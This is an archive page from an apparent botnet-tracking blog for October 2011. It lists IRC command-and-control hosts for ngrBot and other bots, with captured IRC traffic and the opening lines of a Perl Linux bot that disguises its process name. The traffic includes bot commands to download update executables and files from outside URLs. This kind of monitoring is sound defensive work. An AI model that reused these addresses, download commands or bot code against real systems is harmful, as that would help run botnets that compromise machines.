Month: October 2011

109.68.191.160(ngrBot hosted in Russian Federation Moscow Jsc Tel Company)

Uncategorized

Remote Host Port Number 109.68.191.160 1863 PRIVMSG #IrcPeru :[DNS]: Blocked 0 domain(s) – Redirected 40 domain(s) NICK n{US|XPa}civmqel USER civmqel 0 0 :civmqel JOIN #IrcPeru PeruRulz!! JOIN #US PRIVMSG #IrcPeru :[d=”http://magicforkidsparty.com/images/Thumbs.db.exe” s=”159744 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataQcxaxq.exe” – Download retries: 0 174.120.234.158 80 199.15.234.7 80 200.63.96.41 80 PRIVMSG #IrcPeru :[DNS]: Blocked 0Read more...

cyba.sytes.net(irc botnet hosted in Seychelles Ideal Solution Ltd)

Uncategorized

Resolved : [cyba.sytes.net] To [193.107.16.150] Remote Host Port Number 193.107.16.150 20 NICK NEW[XX][XP]6615537921 USER 6615 “” “TsGh” :6615 MODE NEW[XX][XP]6615537921 JOIN #yup JOIN #ys PONG :irc.kittynet.com Remote Host Port Number 193.107.16.47 20 96.9.162.23 80 NICK NEW[XX][XP]4288113806 JOIN #galla PRIVMSG #galla :Down & Exc…OK PONG :irc.kittynet.com USER 4288 “” “TsGh” :4288 MODE NEW[XX][XP]4288113806 JOIN #ys PRIVMSGRead more...

216.245.202.52(linux bot hosted in United States Limestone Networks Inc)

Uncategorized

here the bot used from heckers: #!/usr/bin/perl ################################################ use HTTP::Request; # use HTTP::Request::Common; # use HTTP::Request::Common qw(POST); # use LWP::Simple; # use LWP 5.53; # use LWP::UserAgent; # use Socket; # use IO::Socket; # use IO::Socket::INET; # use IO::Select; # use MIME::Base64; # ################################################ my $datetime = localtime; my $fakeproc = "/usr/sbin/apache2 -k start"; myRead more...

68.53.67.92(ngrBot hosted in United States Murfreesboro Comcast Cable Communications Inc)

Uncategorized

Remote Host Port Number 199.15.234.7 80 68.53.67.92 6667 PASS .. NICK n{US|XPa}uqslazq USER uqslazq 0 0 :uqslazq PONG :9D3E1772 JOIN #!hot ngrBot Now talking in #!hot Topic On: [ #!hot ] [ !mdns http://data.fuskbugg.se/skalman02/4e28ae2064f07_av.txt -n ] Topic By: [ qwerty ] Modes On: [ #!hot ] [ +smntMu ] Quits: qwerty [qwerty@netadmin.ownage.net] (Quit:) heckers inside:Read more...